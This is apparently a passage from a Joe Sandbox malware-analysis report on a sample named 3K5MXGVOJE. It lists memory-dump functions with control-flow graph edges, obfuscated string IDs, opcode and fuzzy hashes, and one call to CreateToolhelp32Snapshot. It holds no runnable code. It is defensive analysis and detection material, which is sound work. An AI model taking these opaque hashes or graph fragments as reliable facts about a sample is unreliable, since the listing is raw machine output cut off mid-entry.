                                        • String ID: 3)4$(:'U$1-8$4d*$8y,y$e}~s$jNP$m~w1$qB
                                        • API String ID: 0-946364564
                                        • Opcode ID: 2cfe3a2e8bf0cbd6987d9e757b1d96553558d2626472828c875454c2de09abce
                                        • Instruction ID: 62b32a342a4d8c871cd536731fef7eb73a5230edb13fd95772ed686b64765bf5
                                        • Opcode Fuzzy Hash: 2cfe3a2e8bf0cbd6987d9e757b1d96553558d2626472828c875454c2de09abce
                                        • Instruction Fuzzy Hash: 81B3DB74E006189FDB94DFA8D891A9EBBB2EF88314F2081E9D449E7354DB349E81CF54
                                        Function 05A08470 Relevance: 15.9, Strings: 9, Instructions: 4643COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 600 5a08470-5a08489 601 5a08490-5a084b5 600->601 604 5a08762-5a0881e 601->604 605 5a084bb-5a085c0 601->605 604->601 618 5a08824-5a08886 604->618 605->601 619 5a085c6-5a0868b 605->619 1181 5a08889 call 518c038 618->1181 1182 5a08889 call 518c01f 618->1182 1183 5a08889 call 518c280 618->1183 632 5a0868e-5a0875c 619->632 623 5a0888e-5a088fb 631 5a08902-5a089a5 623->631 631->619 645 5a089ab-5a08a5e 631->645 632->601 632->604 1175 5a08a61 call 518c038 645->1175 1176 5a08a61 call 518c01f 645->1176 1177 5a08a61 call 518c280 645->1177 649 5a08a66-5a08aa2 649->632 652 5a08aa8-5a08bb0 649->652 652->619 659 5a08bb6-5a08c7a 652->659 659->601 666 5a08c80-5a08d52 659->666 666->619 673 5a08d58-5a08e3e 666->673 673->601 680 5a08e44-5a08f39 673->680 680->601 687 5a08f3f-5a090b0 680->687 1193 5a090b6 call 518c038 687->1193 1194 5a090b6 call 518c01f 687->1194 1195 5a090b6 call 518c280 687->1195 695 5a090bb-5a092be 695->601 712 5a092c4-5a093bf 695->712 712->601 719 5a093c5-5a0948b 712->719 719->605 726 5a09491-5a0954f 719->726 726->601 733 5a09555-5a09648 726->733 733->601 740 5a0964e-5a0995a 733->740 740->605 759 5a09960-5a09a55 740->759 759->601 766 5a09a5b-5a09b7d 759->766 766->605 773 5a09b83-5a09e65 766->773 773->605 792 5a09e6b-5a0a03f 773->792 792->601 805 5a0a045-5a0a140 792->805 805->601 812 5a0a146-5a0a204 805->812 812->601 819 5a0a20a-5a0a30e 812->819 819->605 826 5a0a314-5a0a4ab 819->826 826->601 839 5a0a4b1-5a0a5e4 826->839 1196 5a0a5e6 call 518c038 839->1196 1197 5a0a5e6 call 518c01f 839->1197 1198 5a0a5e6 call 518c280 839->1198 847 5a0a5eb-5a0a684 847->601 852 5a0a68a-5a0a7eb 847->852 1190 5a0a7f1 call 518c038 852->1190 1191 5a0a7f1 call 518c01f 852->1191 1192 5a0a7f1 call 518c280 852->1192 862 5a0a7f6-5a0a825 862->601 865 5a0a82b-5a0aaee 862->865 865->619 884 5a0aaf4-5a0ac10 865->884 884->619 891 5a0ac16-5a0acd7 884->891 1187 5a0acdd call 518c038 891->1187 1188 5a0acdd call 518c01f 891->1188 1189 5a0acdd call 518c280 891->1189 895 5a0ace2-5a0ad15 895->601 898 5a0ad1b-5a0aded 895->898 898->601 905 5a0adf3-5a0aeee 898->905 905->631 912 5a0aef4-5a0b015 905->912 912->601 919 5a0b01b-5a0b10d 912->919 919->604 926 5a0b113-5a0b3b8 919->926 926->618 945 5a0b3be-5a0b595 926->945 945->601 958 5a0b59b-5a0b680 945->958 958->605 965 5a0b686-5a0b794 958->965 965->601 972 5a0b79a-5a0b860 965->972 972->604 979 5a0b866-5a0b91c 972->979 979->601 986 5a0b922-5a0ba74 979->986 1184 5a0ba7a call 518c038 986->1184 1185 5a0ba7a call 518c01f 986->1185 1186 5a0ba7a call 518c280 986->1186 994 5a0ba7f-5a0baf5 994->601 999 5a0bafb-5a0bbfe 994->999 999->601 1006 5a0bc04-5a0bddc 999->1006 1006->605 1019 5a0bde2-5a0c1a2 1006->1019 1019->601 1044 5a0c1a8-5a0c2b8 1019->1044 1044->601 1051 5a0c2be-5a0c3c9 1044->1051 1051->601 1058 5a0c3cf-5a0c972 1051->1058 1058->601 1095 5a0c978-5a0cab7 1058->1095 1178 5a0cabd call 518c038 1095->1178 1179 5a0cabd call 518c01f 1095->1179 1180 5a0cabd call 518c280 1095->1180 1105 5a0cac2-5a0caf2 1105->601 1108 5a0caf8-5a0cbed 1105->1108 1108->605 1115 5a0cbf3-5a0ced3 1108->1115 1115->632 1134 5a0ced9-5a0cfc9 1115->1134 1134->619 1141 5a0cfcf-5a0d085 1134->1141 1141->601 1148 5a0d08b-5a0d40d 1141->1148 1148->605 1173 5a0d413-5a0d436 1148->1173 1175->649 1176->649 1177->649 1178->1105 1179->1105 1180->1105 1181->623 1182->623 1183->623 1184->994 1185->994 1186->994 1187->895 1188->895 1189->895 1190->862 1191->862 1192->862 1193->695 1194->695 1195->695 1196->847 1197->847 1198->847
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3)4$(:'U$1-8$4d*$8y,y$e}~s$jNP$m~w1$qB
                                        • API String ID: 0-946364564
                                        • Opcode ID: 922673624e45bf078ecc461370476a4453edf108ed0ee1d60e45881f184202a5
                                        • Instruction ID: 11de1279474a07d15d1991286b73946a68ef9b8d884b394c8e5dc1d7c6a13075
                                        • Opcode Fuzzy Hash: 922673624e45bf078ecc461370476a4453edf108ed0ee1d60e45881f184202a5
                                        • Instruction Fuzzy Hash: F4B3DB74E006189FDB94DFA8D891A9EBBB2EF88314F2081E9D449E7354DB349E81CF54
                                        Function 02B41098 Relevance: 14.8, Strings: 6, Instructions: 7304COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6'$$$3^$*s2Y$-R9\$6.|$=T,<
                                        • API String ID: 0-145396161
                                        • Opcode ID: ccc3f10d2872f5c640d50f6e8ce27ff2f093b79785d96bab7661244035469224
                                        • Instruction ID: 71b1fffcc3891307a28856b35fd284ef575220af4e4541d8bea0fdb9e3de6a79
                                        • Opcode Fuzzy Hash: ccc3f10d2872f5c640d50f6e8ce27ff2f093b79785d96bab7661244035469224
                                        • Instruction Fuzzy Hash: ABE30075F102289FCB64DF68C840A99B7F6EF89300F5585EAD809F7351DA35AE819F80
                                        Function 0518C908 Relevance: 12.4, Strings: 9, Instructions: 1108COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2117 518c908-518c9b2 call 518c280 * 6 2137 518c9b8-518c9d4 call 518c280 2117->2137 2138 518ca36-518d049 call 518c280 * 43 2117->2138 2137->2138 2142 518c9d6-518c9df 2137->2142 2279 518d04e-518d580 call 518c280 * 24 2138->2279 2145 518c9e4-518ca1e call 518c280 2142->2145 2145->2138 2157 518ca20-518ca35 2145->2157 2354 518d5aa-518d5b1 2279->2354 2355 518d582-518d596 2279->2355 2356 518d598-518d5a5 2355->2356 2357 518d5b2-518d98f call 518c280 * 18 2355->2357 2356->2354 2415 518d994-518d9bb 2357->2415 2416 518d9db-518d9ef 2415->2416 2417 518d9bd-518d9d1 2415->2417 2417->2415 2420 518d9d3-518d9da 2417->2420
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $!$"$#$$$%$&$.$C
                                        • API String ID: 0-3201246462
                                        • Opcode ID: 08ec64e965493c56f887ddc00f8d82509ef0409f34d751947c00cf2c78bef83f
                                        • Instruction ID: 290f5c4a7427905c686a7d973dfa575fdac3bf81d48a3fedee3844302b58a828
                                        • Opcode Fuzzy Hash: 08ec64e965493c56f887ddc00f8d82509ef0409f34d751947c00cf2c78bef83f
                                        • Instruction Fuzzy Hash: 7A82B471B002244BEB94EBF8E8547AFA2A7EBC8314F54412AD48ADB381DF785D054FE5
                                        Function 05DFD688 Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 659COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2421 5dfd688-5dfd993 2584 5dfd998 call 518c038 2421->2584 2585 5dfd998 call 518c01f 2421->2585 2586 5dfd998 call 518c280 2421->2586 2477 5dfd99d-5dfdc8a 2534 5dfdc8c-5dfdca1 2477->2534 2535 5dfdca2-5dfdcd1 2477->2535 2539 5dfdcd4-5dfdce3 call 5dfa35c 2535->2539 2542 5dfdce8-5dfdd1a 2539->2542 2542->2539 2543 5dfdd1c-5dfdd35 2542->2543 2544 5dfdd3b-5dfdd4e 2543->2544 2545 5dfdf9a-5dfe01f CreateToolhelp32Snapshot 2543->2545 2544->2545 2546 5dfdd54-5dfdda7 2544->2546 2550 5dfe028-5dfe03c 2545->2550 2551 5dfe021-5dfe027 2545->2551 2546->2542 2555 5dfddad-5dfddc4 call 5dfa368 2546->2555 2551->2550 2557 5dfddc9-5dfddcb 2555->2557 2558 5dfdf33-5dfdf47 2557->2558 2559 5dfddd1-5dfddf2 2557->2559 2558->2542 2560 5dfdf4d-5dfdf7a call 5dfa380 2558->2560 2559->2542 2561 5dfddf8-5dfde0a 2559->2561 2560->2545 2566 5dfdf7c-5dfdf97 2560->2566 2561->2539 2563 5dfde10-5dfde37 2561->2563 2563->2539 2565 5dfde3d-5dfde65 2563->2565 2567 5dfdeda-5dfdef4 2565->2567 2568 5dfdefa 2567->2568 2569 5dfde67-5dfde6a 2567->2569 2571 5dfdf00-5dfdf0e 2568->2571 2569->2545 2572 5dfde70-5dfde95 2569->2572 2571->2539 2573 5dfdf14-5dfdf2a call 5dfa374 2571->2573 2576 5dfdebb-5dfdec5 2572->2576 2577 5dfde97-5dfde9e 2572->2577 2573->2559 2581 5dfdf30 2573->2581 2576->2542 2580 5dfdecb-5dfded4 2576->2580 2577->2539 2579 5dfdea4-5dfdeb3 2577->2579 2579->2539 2583 5dfdeb9 2579->2583 2580->2567 2581->2558 2583->2571 2584->2477 2585->2477 2586->2477
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $!$"$#$*w/8
                                        • API String ID: 0-3151260935
                                        • Opcode ID: d45d3d5b656971c03f6ee6d3109a2a742ec9f908f1713b2ee75d785b836239e4
                                        • Instruction ID: e9592866f8702d9e4fd9ae598daab74caf5df6c4c8bb2c417407263351fda567
                                        • Opcode Fuzzy Hash: d45d3d5b656971c03f6ee6d3109a2a742ec9f908f1713b2ee75d785b836239e4
                                        • Instruction Fuzzy Hash: 83328170B002245BEB94FBF8E85476E76ABEBC8314F51412AD585EB391CF789C018BE5
                                        Function 06C767BF Relevance: 7.4, Strings: 5, Instructions: 1192COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0l8J$7Q#P$9l#$<71^$N'#r
                                        • API String ID: 0-301275794
                                        • Opcode ID: e13e4353264cb03f41c9eab083c2ad47e7ae41980dea388a528b5b0554aa3fa2
                                        • Instruction ID: 33c1358c8e124053bd5a42890407c3670decec403562083b3a578ff00710e20e
                                        • Opcode Fuzzy Hash: e13e4353264cb03f41c9eab083c2ad47e7ae41980dea388a528b5b0554aa3fa2
                                        • Instruction Fuzzy Hash: 72B28472E116298FDB64CF69C89869DB7B2BB44310F5685AAD80AEB340D770DD85CFC0
                                        Function 02B4DA38 Relevance: 4.7, Strings: 2, Instructions: 2181COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "C2?$;!@
                                        • API String ID: 0-298799055
                                        • Opcode ID: 32185cb7e682a8acae0c2ed9fbb5fde1e7fa95aabe0b761ea4c3c6bf16b03636
                                        • Instruction ID: 174e1d510b45e8cec3aa7bd02ae158e31b8604c847e29bf8e7876a1b7e7983dc
                                        • Opcode Fuzzy Hash: 32185cb7e682a8acae0c2ed9fbb5fde1e7fa95aabe0b761ea4c3c6bf16b03636
                                        • Instruction Fuzzy Hash: DD235E75E002189FDB54DFA8E8D4A9DBBB2FF88324F1441A9E509AB361DB349D81DF40
                                        Function 06C750F8 Relevance: 4.6, Strings: 3, Instructions: 855COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4427 6c750f8-6c7510e 4428 6c75113-6c75134 4427->4428 4428->4428 4429 6c75136-6c7515b 4428->4429 4430 6c75181-6c75190 4429->4430 4431 6c7515d-6c7517f 4429->4431 4433 6c75196-6c751af 4430->4433 4434 6c7529b-6c752b0 4430->4434 4431->4430 4433->4433 4435 6c751b1-6c751f8 4433->4435 4438 6c752b6-6c752c3 4434->4438 4439 6c75b98-6c75bad 4434->4439 4435->4430 4451 6c751fa-6c75202 4435->4451 4438->4428 4440 6c752c9-6c75348 4438->4440 4450 6c75bb4 4439->4450 4448 6c75360-6c75363 4440->4448 4449 6c7534a-6c75350 4440->4449 4454 6c75369-6c7536f 4448->4454 4452 6c75354-6c75356 4449->4452 4453 6c75352 4449->4453 4455 6c75bba-6c75bcf 4450->4455 4456 6c75b4e-6c75b6b 4451->4456 4457 6c75208-6c7520e 4451->4457 4452->4448 4453->4448 4454->4428 4458 6c75375-6c7537b 4454->4458 4473 6c75bd6-6c75c0c 4455->4473 4468 6c75b71-6c75b91 4456->4468 4469 6c75cca-6c75ce3 4456->4469 4457->4428 4459 6c75214-6c75227 4457->4459 4460 6c7537d-6c75397 4458->4460 4461 6c75399-6c753b5 4458->4461 4459->4456 4463 6c7522d-6c7523e 4459->4463 4465 6c753b7-6c753bf 4460->4465 4461->4465 4466 6c75244-6c75290 4463->4466 4467 6c75b48 4463->4467 4465->4428 4470 6c753c5-6c753ed 4465->4470 4466->4431 4478 6c75296 4466->4478 4467->4456 4468->4439 4470->4455 4481 6c753f3-6c7541a 4470->4481 4473->4469 4477 6c75c12-6c75c30 4473->4477 4491 6c75c37-6c75c66 4477->4491 4478->4454 4481->4450 4484 6c75420-6c75434 4481->4484 4485 6c7557d-6c7558a 4484->4485 4486 6c7543a-6c75455 4484->4486 4485->4429 4489 6c75590-6c755af 4485->4489 4486->4428 4488 6c7545b-6c7546b 4486->4488 4488->4485 4490 6c75471-6c75484 4488->4490 4489->4428 4495 6c755b5-6c755b9 4489->4495 4490->4429 4492 6c7548a-6c754b1 4490->4492 4491->4469 4493 6c75c68-6c75c85 4491->4493 4492->4485 4502 6c754b7-6c754c3 4492->4502 4510 6c75c8c-6c75cac 4493->4510 4498 6c755bb-6c755d2 4495->4498 4499 6c755d8-6c755e7 4495->4499 4498->4499 4500 6c756ef-6c756f9 4499->4500 4501 6c755ed-6c755f7 4499->4501 4503 6c7570c-6c75762 4500->4503 4504 6c756fb-6c75701 4500->4504 4501->4430 4505 6c755fd-6c75609 4501->4505 4502->4430 4506 6c754c9-6c754e0 4502->4506 4523 6c7584c-6c75932 4503->4523 4524 6c75768-6c7577e 4503->4524 4509 6c75707 4504->4509 4504->4510 4564 6c7560f call 6c75f71 4505->4564 4565 6c7560f call 6c75f80 4505->4565 4506->4473 4511 6c754e6-6c754ef 4506->4511 4509->4428 4510->4469 4512 6c75cae-6c75cc3 4510->4512 4511->4428 4516 6c754f5-6c75505 4511->4516 4512->4469 4514 6c75615-6c75621 4514->4428 4517 6c75627-6c7565f 4514->4517 4516->4485 4518 6c75507-6c7551b 4516->4518 4517->4430 4531 6c75665-6c756b7 4517->4531 4518->4431 4519 6c75521-6c75562 4518->4519 4519->4485 4534 6c75564-6c75572 4519->4534 4541 6c75938-6c7593e 4523->4541 4524->4469 4527 6c75784-6c75831 4524->4527 4527->4469 4535 6c75837-6c75841 4527->4535 4531->4431 4540 6c756bd-6c756ed 4531->4540 4534->4491 4536 6c75578 4534->4536 4535->4428 4538 6c75847 4535->4538 4536->4428 4538->4541 4540->4503 4541->4435 4542 6c75944-6c75978 4541->4542 4542->4428 4547 6c7597e-6c7599e 4542->4547 4547->4428 4550 6c759a4-6c75a0c 4547->4550 4550->4430 4555 6c75a12-6c75aa2 4550->4555 4555->4431 4558 6c75aa8-6c75ac3 4555->4558 4558->4429 4559 6c75ac9-6c75ae8 4558->4559 4559->4430 4560 6c75aee-6c75afb 4559->4560 4561 6c75b3e-6c75b45 4560->4561 4562 6c75afd-6c75b03 4560->4562 4562->4430 4563 6c75b09-6c75b38 4562->4563 4563->4561 4564->4514 4565->4514
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: +q$$$5'$<B=z
                                        • API String ID: 0-1297642020
                                        • Opcode ID: 08c6125a5a0b720574e86ddbd90cddd447901adb00743f0480dbb4808fa94ddc
                                        • Instruction ID: 35e270c3ab5c6d4c96e5cc05b563759ee7d77be8590dbd1ab3163ce0ac4f897d
                                        • Opcode Fuzzy Hash: 08c6125a5a0b720574e86ddbd90cddd447901adb00743f0480dbb4808fa94ddc
                                        • Instruction Fuzzy Hash: 02621972F106289FDB58DF6DD894659B6E2BB88310B4A856AEC09EB354DF70DC41CBC0
                                        Function 05A00C40 Relevance: 4.6, Strings: 3, Instructions: 834COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4566 5a00c40-5a00c4c 4567 5a00c4f-5a00c64 4566->4567 4570 5a00c69-5a00c83 4567->4570 4572 5a00da7-5a00dae 4570->4572 4573 5a00c89-5a00ca0 4570->4573 4574 5a01143-5a0116c 4573->4574 4575 5a00ca6-5a00cfb 4573->4575 4578 5a01171-5a0118d 4574->4578 4575->4567 4579 5a00d01-5a00d21 4575->4579 4580 5a011ab-5a011d7 4578->4580 4581 5a0118f-5a011a5 4578->4581 4579->4574 4582 5a00d27-5a00d3a 4579->4582 4588 5a011dc-5a011f0 4580->4588 4581->4578 4586 5a011a7-5a011aa 4581->4586 4582->4574 4583 5a00d40-5a00da5 4582->4583 4583->4572 4593 5a00db1-5a00dbd 4583->4593 4594 5a011f6-5a0121b 4588->4594 4593->4567 4595 5a00dc3-5a00dd9 4593->4595 4594->4588 4598 5a0121d-5a0122c 4594->4598 4595->4574 4596 5a00ddf-5a00de9 4595->4596 4690 5a00def call 518c038 4596->4690 4691 5a00def call 518c01f 4596->4691 4692 5a00def call 518c280 4596->4692 4600 5a016f0-5a01746 4598->4600 4601 5a01232-5a0127b 4598->4601 4599 5a00df4-5a00e3a 4693 5a00e3c call 5a03230 4599->4693 4694 5a00e3c call 5a03119 4599->4694 4601->4594 4605 5a01281-5a012ae 4601->4605 4605->4600 4608 5a012b4-5a012c3 4605->4608 4608->4600 4609 5a012c9-5a01314 4608->4609 4620 5a01316-5a0131c 4609->4620 4621 5a01328-5a01344 4609->4621 4610 5a00e42-5a00e68 4614 5a00e83-5a00eaf 4610->4614 4615 5a00e6a-5a00e73 4610->4615 4614->4574 4616 5a00eb5-5a00eda 4614->4616 4615->4570 4617 5a00e79-5a00e80 4615->4617 4616->4573 4625 5a00ee0-5a00f02 4616->4625 4620->4621 4622 5a0131e-5a01325 4620->4622 4621->4600 4623 5a0134a-5a013b3 4621->4623 4635 5a013b5-5a013be 4623->4635 4636 5a013ce-5a013e8 4623->4636 4625->4574 4627 5a00f08-5a01021 4625->4627 4627->4574 4653 5a01027-5a0103e 4627->4653 4635->4588 4638 5a013c4-5a013cb 4635->4638 4636->4600 4639 5a013ee-5a0140e 4636->4639 4639->4588 4645 5a01414-5a01423 4639->4645 4645->4600 4646 5a01429-5a015b0 4645->4646 4646->4600 4673 5a015b6-5a015c7 4646->4673 4656 5a01040-5a01062 4653->4656 4657 5a0109f-5a010a5 4653->4657 4656->4574 4658 5a01068-5a0109d 4656->4658 4660 5a010ab-5a01118 4657->4660 4658->4660 4660->4574 4671 5a0111a-5a01140 4660->4671 4677 5a01645-5a01651 4673->4677 4678 5a015cd-5a01615 4673->4678 4680 5a01657-5a016bc 4677->4680 4678->4600 4679 5a0161b-5a01643 4678->4679 4679->4680 4680->4600 4687 5a016be-5a016ed 4680->4687 4690->4599 4691->4599 4692->4599 4693->4610 4694->4610
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: *i.$3n$ ym^
                                        • API String ID: 0-1890479547
                                        • Opcode ID: 8e4a03140aec74e5851cab64f223a9d14c939c284497396a397cd47feceed0a3
                                        • Instruction ID: cb5e5167a063846e15169bf215412cede61c1485926f599ddf142b8e07c92039
                                        • Opcode Fuzzy Hash: 8e4a03140aec74e5851cab64f223a9d14c939c284497396a397cd47feceed0a3
                                        • Instruction Fuzzy Hash: 2462A536F101248FC754DF68D89099AB7F6FB8431475A856AD80AEB395DB31ED06CBC0
                                        Function 05A07E38 Relevance: 4.2, Strings: 3, Instructions: 408COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4695 5a07e38-5a07e6e 4698 5a07e73-5a07ea2 4695->4698 4701 5a07ea4-5a07ec7 4698->4701 4701->4698 4704 5a07ec9-5a07ee6 4701->4704 4704->4701 4706 5a07ee8-5a07f1b 4704->4706 4709 5a07f21-5a07f6e 4706->4709 4710 5a08322-5a0835e 4706->4710 4709->4710 4711 5a07f74-5a07fd5 4709->4711 4714 5a08360-5a0836e 4710->4714 4715 5a0836f-5a08399 call 6c70148 4710->4715 4711->4710 4721 5a07fdb-5a07fee 4711->4721 4720 5a0839f-5a083a0 4715->4720 4721->4710 4722 5a07ff4-5a0804a 4721->4722 4722->4710 4726 5a08050-5a08064 4722->4726 4726->4710 4727 5a0806a-5a080f3 4726->4727 4727->4710 4731 5a080f9-5a08105 4727->4731 4731->4710 4732 5a0810b-5a0818e 4731->4732 4732->4710 4736 5a08194-5a081aa 4732->4736 4736->4710 4737 5a081b0-5a081ef 4736->4737 4737->4710 4741 5a081f5-5a08216 4737->4741 4741->4710 4742 5a0821c-5a082ae 4741->4742 4746 5a082cf-5a082f5 4742->4746 4748 5a082b0-5a082c4 call 5a00af8 4746->4748 4749 5a082f7-5a0830d 4746->4749 4752 5a082c9 4748->4752 4749->4710 4752->4746
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %f#2$SS$R
                                        • API String ID: 0-2568461884
                                        • Opcode ID: cf76d34603b710483430f20b7e83b504b0a223fe299630b377f5799be3e25c0a
                                        • Instruction ID: 475bfae18bcbb50df2f8133f01f7ea60a015af45b0c9c3f6bd56693115b434ca
                                        • Opcode Fuzzy Hash: cf76d34603b710483430f20b7e83b504b0a223fe299630b377f5799be3e25c0a
                                        • Instruction Fuzzy Hash: 2EE18874B102059FCB44CF98E8C0A5AF7E2BB88304B69C529E01ADB395DB75ED06CB84
                                        Function 05A07E29 Relevance: 4.1, Strings: 3, Instructions: 347COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4755 5a07e29-5a07e5a 4757 5a07e64-5a07e66 4755->4757 4758 5a07e6e 4757->4758 4759 5a07e73-5a07ea2 4758->4759 4762 5a07ea4-5a07ec7 4759->4762 4762->4759 4765 5a07ec9-5a07ee6 4762->4765 4765->4762 4767 5a07ee8-5a07f1b 4765->4767 4770 5a07f21-5a07f6e 4767->4770 4771 5a08322-5a0835e 4767->4771 4770->4771 4772 5a07f74-5a07fd5 4770->4772 4775 5a08360-5a0836e 4771->4775 4776 5a0836f 4771->4776 4772->4771 4782 5a07fdb-5a07fee 4772->4782 4779 5a08374-5a08399 call 6c70148 4776->4779 4781 5a0839f-5a083a0 4779->4781 4782->4771 4783 5a07ff4-5a0804a 4782->4783 4783->4771 4787 5a08050-5a08064 4783->4787 4787->4771 4788 5a0806a-5a080f3 4787->4788 4788->4771 4792 5a080f9-5a08105 4788->4792 4792->4771 4793 5a0810b-5a0818e 4792->4793 4793->4771 4797 5a08194-5a081aa 4793->4797 4797->4771 4798 5a081b0-5a081ef 4797->4798 4798->4771 4802 5a081f5-5a08216 4798->4802 4802->4771 4803 5a0821c-5a082ae 4802->4803 4807 5a082cf-5a082f5 4803->4807 4809 5a082b0-5a082c9 call 5a00af8 4807->4809 4810 5a082f7-5a0830d 4807->4810 4809->4807 4810->4771
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %f#2$SS$R
                                        • API String ID: 0-2568461884
                                        • Opcode ID: 92b8671eba51b957692a1e0d013981aad354d47a3d0f0768be78720ea9583d36
                                        • Instruction ID: 4b81051610e604469c9226a06982f08ff418748ba4ec42a2ed71749879ba012b
                                        • Opcode Fuzzy Hash: 92b8671eba51b957692a1e0d013981aad354d47a3d0f0768be78720ea9583d36
                                        • Instruction Fuzzy Hash: DAD18774B102059FCB44CF99E8D0A5AF7E3BB88304B69C529E40ADB395DB75ED06CB84
                                        Function 05DFBC90 Relevance: 3.9, Strings: 2, Instructions: 1430COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4816 5dfbc90-5dfbcaf 4817 5dfbcb4-5dfbcd1 4816->4817 4820 5dfbcd7-5dfbd0a 4817->4820 5071 5dfbd10 call 518c038 4820->5071 5072 5dfbd10 call 518c01f 4820->5072 5073 5dfbd10 call 518c280 4820->5073 4822 5dfbd15-5dfc570 4899 5dfc576-5dfc6c8 4822->4899 4899->4817 4911 5dfc6ce-5dfc6f2 4899->4911 4912 5dfcb6b-5dfcb96 4911->4912 4913 5dfc6f8-5dfc710 4911->4913 4917 5dfcb9b-5dfcbca 4912->4917 4913->4912 4914 5dfc716-5dfc75d 4913->4914 4914->4899 4922 5dfc763-5dfc7f4 4914->4922 4918 5dfcbed-5dfcc14 4917->4918 4919 5dfcbcc-5dfcbe5 4917->4919 4925 5dfcc19-5dfcc35 4918->4925 4919->4917 4924 5dfcbe7-5dfcbec 4919->4924 4922->4912 4939 5dfc7fa-5dfc81a 4922->4939 4928 5dfcc3b-5dfcc7c 4925->4928 4929 5dfce19-5dfce20 4925->4929 4931 5dfcc7e-5dfcc80 4928->4931 4932 5dfcc88-5dfcc8b 4928->4932 4933 5dfcc86 4931->4933 4934 5dfce23 4931->4934 4932->4934 4935 5dfcc91-5dfccbf 4932->4935 4933->4935 4937 5dfce28-5dfce65 4934->4937 4935->4937 4938 5dfccc5-5dfccfd 4935->4938 4943 5dfce6b-5dfce88 4937->4943 4944 5dfd134-5dfd13b 4937->4944 4945 5dfccff-5dfcd01 4938->4945 4946 5dfcd09-5dfcd0c 4938->4946 4939->4912 4947 5dfc820-5dfc8c1 4939->4947 4943->4944 4954 5dfce8e-5dfce9d 4943->4954 4955 5dfd140-5dfd14f 4944->4955 4945->4934 4949 5dfcd07 4945->4949 4946->4934 4948 5dfcd12-5dfcd15 4946->4948 4947->4912 4972 5dfc8c7-5dfc8e8 4947->4972 4948->4937 4950 5dfcd1b-5dfcd39 4948->4950 4949->4948 5059 5dfcd3b call 51a0388 4950->5059 5060 5dfcd3b call 51a03b8 4950->5060 5061 5dfcd3b call 51a20fc 4950->5061 5062 5dfcd3b call 51a218c 4950->5062 5063 5dfcd3b call 5dfcbf8 4950->5063 5064 5dfcd3b call 5dfa0f1 4950->5064 5065 5dfcd3b call 5dfd101 4950->5065 5066 5dfcd3b call 5dfbc90 4950->5066 5067 5dfcd3b call 5dfbc80 